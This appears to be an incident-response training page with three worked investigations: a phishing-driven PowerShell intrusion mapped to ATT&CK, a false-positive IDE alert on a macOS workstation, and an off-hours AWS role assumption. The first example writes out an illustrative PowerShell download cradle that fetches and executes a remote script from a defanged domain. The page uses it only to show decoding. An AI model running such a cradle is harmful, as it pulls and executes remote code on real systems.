Uncover working example

Working example

Pulling the evidence on the finance-team intrusion

Scope set the boundary: phishing-driven intrusion, 72-hour primary window with a 4-week look at primary entities, three primary identities, three secondary identities, PCI and GDPR active. Uncover begins.

Step 1. Endpoint telemetry

EDR for laptop-finance-09 over the 72-hour window. The Outlook → cmd → PowerShell chain is confirmed. The encoded command decodes to a download cradle pulling a second-stage payload from invoice-records[.]com/upd. The dropped file lives at %TEMP%\upd.ps1 with SHA-256 captured. No prior PowerShell from this user account; baseline confirms abnormality.

Mapped to ATT&CK: T1566 (Phishing) → T1059.001 (PowerShell) → T1105 (Ingress Tool Transfer).
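The decoding step above can be sketched in a few lines. PowerShell's `-EncodedCommand` is base64 over UTF-16LE text; the cradle string below is an illustrative stand-in for the observed behavior, not the actual payload from the case.

```python
import base64

def decode_powershell_encoded(b64_blob: str) -> str:
    """-EncodedCommand payloads are base64 over UTF-16LE text."""
    return base64.b64decode(b64_blob).decode("utf-16-le")

# Illustrative download cradle matching the observed pattern (not the real payload).
cradle = "IEX (New-Object Net.WebClient).DownloadString('https://invoice-records[.]com/upd')"
blob = base64.b64encode(cradle.encode("utf-16-le")).decode("ascii")
print(decode_powershell_encoded(blob))
```

Decoding in the analysis environment, never by executing the command, is what turns an opaque EDR field into the T1105 evidence.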

Step 2. Network correlation

Proxy logs confirm the HTTPS connection to invoice-records[.]com. DNS history shows the domain registered 4 days ago, low prevalence, no prior queries from the environment. Firewall logs show outbound TLS at 09:11:43, exactly correlated with the PowerShell PID. Self-signed certificate with generic CN. The destination IP is in a hosting provider’s bulletproof range.

Mapped to ATT&CK: T1071.001 (Application Layer Protocol: Web Protocols).
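The firewall-to-process correlation can be sketched as a small timestamp join. The event shapes (`ts`, `pid`, `image`, `dst`) are illustrative, not any vendor's schema; the two-second window is an assumed tolerance.

```python
from datetime import datetime, timedelta

def correlate(process_events, firewall_events, window=timedelta(seconds=2)):
    """Pair outbound connections with process starts inside a small time window."""
    hits = []
    for fw in firewall_events:
        for proc in process_events:
            if abs(fw["ts"] - proc["ts"]) <= window:
                hits.append((proc["pid"], proc["image"], fw["dst"], fw["ts"]))
    return hits

procs = [{"ts": datetime(2026, 5, 12, 9, 11, 42), "pid": 4812, "image": "powershell.exe"}]
fw = [{"ts": datetime(2026, 5, 12, 9, 11, 43), "dst": "invoice-records[.]com:443"}]
print(correlate(procs, fw))  # one hit: PowerShell PID tied to the outbound TLS
```

Exact-PID attribution usually comes from the EDR's own network telemetry; the join above is the fallback when only firewall logs carry the connection.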

Step 3. Identity logs

dlin’s authentication history over the window: normal corporate-network logins, no anomalous geographies, no MFA bypass. However: a second authentication path appears in cloud identity logs about 12 minutes after the alert. The session was federated from the on-premises identity, still using dlin’s credentials. Targeted the cloud finance platform. Successful.

Mapped to ATT&CK: T1078.004 (Valid Accounts: Cloud Accounts).
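The "second authentication path shortly after the alert" check can be expressed as a simple filter over cloud identity logs. Field names and the 30-minute horizon are illustrative assumptions.

```python
from datetime import datetime, timedelta

def federated_logins_after(alert_ts, cloud_auth_events, horizon=timedelta(minutes=30)):
    """Return federated cloud authentications landing shortly after an endpoint alert."""
    return [e for e in cloud_auth_events
            if e["auth_type"] == "federated"
            and alert_ts <= e["ts"] <= alert_ts + horizon]

alert = datetime(2026, 5, 12, 9, 11)
events = [{"ts": alert + timedelta(minutes=12), "auth_type": "federated",
           "user": "dlin", "app": "cloud-finance"}]
print(federated_logins_after(alert, events))  # the 12-minute-later session surfaces
```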

Step 4. Mail and SaaS

Mailbox audit confirms the originating email: vendor-themed subject, attachment that decoded to a macro-laden Word document. Three other recipients in the finance team received the same email; two opened it. EDR on those two hosts is queried; one shows the same Outlook → cmd → PowerShell chain. Cloud finance platform logs (vendor-provided, requested during Scope) show no in-app activity beyond the federated login.

Mapped to ATT&CK: T1566.001 (Spearphishing Attachment).
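The received/opened/chain-confirmed cross-reference is worth making explicit, because it separates "watch" from "escalate." A minimal sketch, where the peer usernames are placeholders (only dlin comes from the case):

```python
def triage_recipients(recipients, opened, chain_hosts):
    """Cross-reference mailbox-audit recipients, open events, and EDR chain hits."""
    return {u: {"opened": u in opened, "chain_on_host": u in chain_hosts}
            for u in recipients}

recipients = ["dlin", "fin-user-2", "fin-user-3", "fin-user-4"]
opened = {"dlin", "fin-user-2", "fin-user-3"}   # three of four opened
chain_hosts = {"dlin", "fin-user-2"}            # chain confirmed on two hosts
report = triage_recipients(recipients, opened, chain_hosts)
print(report["fin-user-3"])  # opened but no chain: monitor, don't escalate yet
```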

Step 5. Map to ATT&CK and finalize the narrative

The complete chain:

T1566.001  Spearphishing attachment delivered to 4 finance team users
T1204.002  User execution: 2 users opened the document
T1059.001  PowerShell execution invoked from macro
T1105      Ingress tool transfer: second-stage payload pulled from external domain
T1071.001  Outbound HTTPS to attacker-controlled domain
T1078.004  Valid accounts: federated login to cloud finance platform

Two confirmed compromises (the original alert host plus one peer). No evidence of in-app activity yet on the cloud platform, but the federated login is the lateral-movement signal. Uncover ends with this narrative ready for the Risk phase.
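The finalized chain can travel to the Risk phase as structured data rather than prose, so downstream tooling can consume it. A minimal sketch of that handoff shape, with a hypothetical rendering helper:

```python
attack_chain = [
    ("T1566.001", "Spearphishing attachment delivered to 4 finance team users"),
    ("T1204.002", "User execution: 2 users opened the document"),
    ("T1059.001", "PowerShell execution invoked from macro"),
    ("T1105", "Ingress tool transfer: payload pulled from external domain"),
    ("T1071.001", "Outbound HTTPS to attacker-controlled domain"),
    ("T1078.004", "Valid accounts: federated login to cloud finance platform"),
]

def render_handoff(chain):
    """Format the technique chain for the Risk-phase handoff document."""
    return "\n".join(f"{tid:<10} {desc}" for tid, desc in chain)

print(render_handoff(attack_chain))
```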


A second scenario: confirming a false-positive on the developer workstation

The first walkthrough showed Uncover building a positive narrative: this is the chain, here are the techniques, here is what to do next. Real triage often runs the other direction. The hypothesis is “compromise”; the evidence has to either confirm it or rule it out with explicit confidence. The methodology demands the same rigor on both paths.

Working example

Pulling the evidence on the Cursor IDE alert

Scope handed off a narrow boundary: macOS developer workstation, frontend engineer, alert minus 1 hour through alert plus 4 hours, EDR primary, the Cursor IDE / Cursor Helper alert that looked like Empire but came from a signed vendor binary. Uncover begins.

Step 1. Endpoint telemetry

EDR data from CrowdStrike, scoped to the time window.

  • 14:03 UTC. User launched Cursor IDE.
  • 14:03–14:04 UTC. ripgrep search for a test string involving a reCAPTCHA token. Consistent with active code work.
  • 14:04–14:07 UTC. Multiple git commands: fetch repository content, access to test files in BlockerEmailVerification and BlockerPhoneVerification modules.
  • 14:08 UTC. JavaScript test runner configuration, relevant test files loaded.
  • 14:08+ UTC. Additional git fetch operations tied to a specific Pull Request. Local branch checked out to feat-migrate-phone-verification-to-flow.

This sequence is a textbook developer workflow on a feature migration. Process tree, command lines, and file access all align with the user’s documented role.

Mapped to ATT&CK: nothing in this sequence maps to an attack technique. Worth recording explicitly so the handoff says “behavior is consistent with role” rather than leaving the question open.

Step 2. Network and tooling analysis

Network telemetry over the same window.

  • Outbound destinations. Legitimate corporate version-control hosts, internal development services, collaboration tools. All previously seen, all expected for the role.
  • Traffic volume and frequency. Consistent with normal development. No unusual transfer volume, no beaconing pattern, no periodic callbacks.
  • Protocols and ports. Standard ports for the observed services. No protocol tunneling, no port mismatch indicative of evasion.
  • DNS queries. Internal development domains and trusted external services. No DGA-like entropy, no resolutions to known-malicious domains.

The network picture matches the endpoint picture. Nothing here suggests the binary’s TLS-encrypted outbound calls (the original signal that mapped to Empire patterns) were to anything other than the IDE’s documented vendor infrastructure.
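The "no beaconing pattern" claim can be checked mechanically: periodic callbacks produce suspiciously regular inter-arrival times. One common heuristic is the coefficient of variation of the gaps; the 0.1 threshold below is an illustrative starting point, not a tuned value.

```python
from statistics import mean, stdev

def looks_like_beaconing(timestamps, cv_threshold=0.1):
    """Low coefficient of variation in inter-arrival times suggests periodic callbacks."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 3:
        return False  # too few samples to call a cadence
    m = mean(gaps)
    return m > 0 and (stdev(gaps) / m) < cv_threshold

# Irregular, human-driven traffic (seconds since window start): not beaconing.
print(looks_like_beaconing([0, 41, 95, 300, 302, 710]))   # → False
# Near-perfect 60-second cadence: beaconing-shaped.
print(looks_like_beaconing([0, 60, 120, 180, 240, 300]))  # → True
```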

Step 3. Tooling coverage gaps

Uncover does not just report what it found. It reports what it could not see.

  • CrowdStrike on macOS: active, capturing process execution, file access, network traffic. Primary source, working as expected.
  • Native full-packet capture: not available on this macOS configuration. Payload-level inspection of encrypted traffic is therefore not possible from the host’s perspective.
  • USB device monitoring: absent. Cannot conclusively rule out offline data movement.
  • Persistence mechanisms (LaunchAgents, LaunchDaemons): reviewed via EDR file activity. No new entries during the window.
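The launchd review above can be sketched as a filter over the EDR file-activity feed. The event shape (`ts`, `action`, `path`) is illustrative, not a vendor schema.

```python
from datetime import datetime

LAUNCHD_DIRS = ("/Library/LaunchAgents/", "/Library/LaunchDaemons/")

def new_persistence_entries(file_events, start, end):
    """Return launchd plist creations that landed inside the alert window."""
    return [e for e in file_events
            if e["action"] == "create"
            and e["path"].endswith(".plist")
            and any(d in e["path"] for d in LAUNCHD_DIRS)
            and start <= e["ts"] <= end]

window = (datetime(2026, 5, 12, 13, 0), datetime(2026, 5, 12, 18, 0))
events = [{"ts": datetime(2026, 5, 12, 14, 5), "action": "create",
           "path": "/Users/dev/project/.git/index.lock"}]
print(new_persistence_entries(events, *window))  # → [] — no new launchd entries
```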

What the gaps mean for the verdict

Uncover’s job at this step is to be explicit about confidence. The two gaps (full PCAP and USB) mean certain attack vectors cannot be fully ruled out from telemetry alone.

However, no other evidence in the available sources supports expanding scope to chase those vectors. The methodology calls this out as “no positive evidence supports expansion at this time, gaps documented, will revisit if new signals surface” rather than pretending the gaps do not exist or panic-expanding the investigation because of them.

Step 4. Behavioral correlation against the role baseline

Subject’s analysis already established this user’s baseline as consistent with the activity. Uncover validates that claim with the deeper telemetry.

  • Peer comparison. Three other engineers on the same team show similar Cursor process trees and network patterns over the past 30 days. The behavior is not unique to this user.
  • Historical workflow. The user’s last 14 days show consistent IDE usage, regular git activity, and the same outbound destinations. The 14:03 sequence is part of a continuous workflow, not a sudden anomaly.
  • No persistence created. No new launchd plists, no new login items, no new scheduled tasks. The binary did not attempt to anchor itself to the system.
  • No credential access. Keychain access logs show no unusual reads. No new SSH keys, no API token grabs.

Four corroborating sources (peer baseline, individual history, persistence absence, credential absence) all agree with the role-consistent reading.

Step 5. Verdict and handoff

Uncover ends with a structured, defensible verdict.

  • Verdict: false-positive with explicit caveats. The detection logic correctly flagged a process behavior pattern that overlaps with Empire tradecraft, but the full investigation shows the behavior is consistent with a signed, role-appropriate IDE running in its documented configuration.
  • Confidence: high on the binary identity, network destinations, and user behavior. Medium on full coverage due to the macOS PCAP and USB monitoring gaps; mitigated by absence of corroborating signals.
  • ATT&CK chain: none. No techniques observed beyond legitimate development activity.
  • Detection feedback: the rule that fired is too broad for macOS developer workstations running Electron-based IDEs. A tuned variant that incorporates binary signature, install path, and runtime context would have suppressed this alert. Feature request opened.
  • Open question for Risk: are the documented coverage gaps (macOS PCAP, USB) acceptable given the developer-workstation population’s risk profile, or do they warrant additional tooling investment? That is a Risk-phase question, not an Uncover-phase one.
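The tuned-rule idea from the detection-feedback bullet can be sketched as a suppression predicate: keep the Empire-pattern logic, but require signature, install path, and runtime context to all fail before firing. Field names and the signer string are illustrative assumptions, not any EDR's actual schema.

```python
def empire_pattern_should_fire(event):
    """Fire the Empire-pattern rule only when the IDE trust checks fail."""
    trusted_ide = (
        event.get("signed") is True
        and event.get("signer", "").startswith("Developer ID Application:")
        and event.get("image_path", "").startswith("/Applications/Cursor.app/")
    )
    return not trusted_ide

benign = {"signed": True,
          "signer": "Developer ID Application: Example Vendor Inc",
          "image_path": "/Applications/Cursor.app/Contents/MacOS/Cursor Helper"}
print(empire_pattern_should_fire(benign))            # → False, alert suppressed
print(empire_pattern_should_fire({"signed": False}))  # → True, unsigned binary still fires
```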

What this Uncover deliverable proves

A false-positive verdict that meets the methodology’s standard is not “dismissed.” It is documented, evidenced, and bounded. The case has:

  • Defensible scope (Scope’s boundary)
  • Defensible subject reads (Subject’s per-entity assessments)
  • Defensible Uncover evidence (this page’s telemetry, with explicit gaps named)
  • A detection-engineering feedback loop (the over-broad rule)
  • A teed-up Risk question (acceptable coverage gaps?)

That is what a fully written false-positive looks like. The investigation can be re-opened with full context if new signals appear. Without this kind of write-up, the same alert will fire again next week and the analyst will start from zero.


A cloud-native mini-example: the IAM role assumption

The two cases above are endpoint-anchored. The same methodology works for cloud-origin alerts where the endpoint is irrelevant; what matters is the API call, the principal, and the role chain. This shorter walkthrough shows how Uncover applies to a 2026-typical cloud alert.

Working example

An unexpected AssumeRole in AWS at 02:14 UTC

GuardDuty fires: a long-tenure IAM user invokes sts:AssumeRole to take a role that is normally used only by a CI pipeline. The role grants S3 read on a regulated-data bucket. The user is a senior data engineer; the time is 02:14 UTC, outside their usual window. Subject and Scope set narrow bounds (this user, this role, this bucket, alert minus 1 hour through alert plus 4). Uncover begins.

Step 1. CloudTrail correlation

Pull the user’s CloudTrail events over the time window plus 7 days of baseline.

  • 02:13:58 UTC. sts:GetCallerIdentity from the user. Source IP resolves to a corporate VPN egress.
  • 02:14:02 UTC. sts:AssumeRole for arn:aws:iam::<account>:role/ci-data-export, session name local-investigation-2026-05-12.
  • 02:14–02:31 UTC. Eight s3:GetObject calls against regulated-pii-bucket, all against keys matching quarterly-export/*.
  • Baseline check. The user has assumed other roles regularly, but not ci-data-export. The role is technically grantable to anyone in the data-engineers group; it’s just rarely used outside CI.

Mapped to ATT&CK: T1078.004 Valid Accounts: Cloud Accounts + T1530 Data from Cloud Storage.
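The baseline check in the last bullet reduces to a set-membership test over the principal's recent role assumptions. The event below is a pared-down stand-in for a CloudTrail AssumeRole record, and the account ID is AWS's documentation placeholder, not a real account.

```python
def first_time_role(event, baseline_roles):
    """True when a principal assumes a role absent from its recent baseline."""
    return event["requestParameters"]["roleArn"] not in baseline_roles

baseline = {"arn:aws:iam::111122223333:role/data-eng-read"}
event = {"requestParameters":
         {"roleArn": "arn:aws:iam::111122223333:role/ci-data-export"}}
print(first_time_role(event, baseline))  # → True: first-ever use of ci-data-export
```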

Step 2. IdP context

The role-assumption is gated by SSO. Pull the IdP authentication that preceded it.

  • SSO login at 02:13:14 UTC, FIDO2 second factor satisfied, registered device matches the user’s laptop.
  • No impossible travel signal, same geographic region as their typical sign-in.
  • No OAuth consent grant events in the prior 14 days; no new app authorizations.
  • No token-replay indicators: the AWS API calls use credentials minted by this fresh STS session, not a long-lived access key.

The identity surface reads clean. None of the attacker patterns that would explain an unexpected role assumption (token theft, consent abuse, AiTM phishing) shows corroborating evidence.

Step 3. Bucket access pattern

The actions taken inside the assumed role’s session are what determine whether this matters.

  • Eight objects read. All from quarterly-export/. No s3:ListBucket reconnaissance. No traversal into other prefixes.
  • No write, no delete. No new objects created. No s3:DeleteObject. No bucket-policy or ACL changes.
  • Egress check. The session’s source IP is the same corporate VPN throughout. No anomalous data-transfer destination.
  • Object size. Total ~120 MB across the eight keys, consistent with quarterly export files; not a bulk-exfil signature.
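The four bullets above can be collapsed into one session summary over the S3 data events. Event fields are simplified illustrations of what the data-events trail provides; the eight 15 MB objects are synthetic stand-ins matching the case's totals.

```python
def summarize_s3_session(events, allowed_prefix="quarterly-export/"):
    """Summarize data-event activity for one STS session."""
    reads = [e for e in events if e["eventName"] == "GetObject"]
    return {
        "objects_read": len(reads),
        "outside_prefix": [e["key"] for e in reads
                           if not e["key"].startswith(allowed_prefix)],
        "list_calls": sum(e["eventName"] == "ListBucket" for e in events),
        "writes_or_deletes": sum(e["eventName"] in {"PutObject", "DeleteObject"}
                                 for e in events),
        "total_mb": round(sum(e.get("bytes", 0) for e in reads) / 1e6, 1),
    }

session = [{"eventName": "GetObject",
            "key": f"quarterly-export/part-{i}.csv.gz",
            "bytes": 15_000_000} for i in range(8)]
print(summarize_s3_session(session))  # 8 reads, all in-prefix, ~120 MB, no writes
```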

Step 4. Verdict and gaps

The hypothesis going in was “unexpected role use on regulated data.” The evidence supports a more boring read:

  • Likely verdict: off-hours manual export by the engineer (confirmed via Slack DM after the on-shift IR opened a quick check). Consistent with quarterly-export work that normally runs in the CI pipeline.
  • Confidence: high on the technical evidence. Medium until the user confirms (which they did, ~15 min into Uncover).
  • Coverage gaps: the S3 data-events trail is on for regulated-pii-bucket; it would NOT be on for buckets without explicit data-event logging. This is a detection-engineering note, not a blocker for this case.
  • Detection-tuning suggestion: add an “automation-only” tag to roles like ci-data-export so manual assumption fires a lower-noise informational signal instead of GuardDuty’s high-severity alert. Feeds the false-positive-into-feedback loop.

This is what Uncover looks like when the case is cloud-anchored: same methodology, different sources (CloudTrail, IdP logs, S3 data events), same standard of evidence.


Next up

Uncover quiz

Take the quiz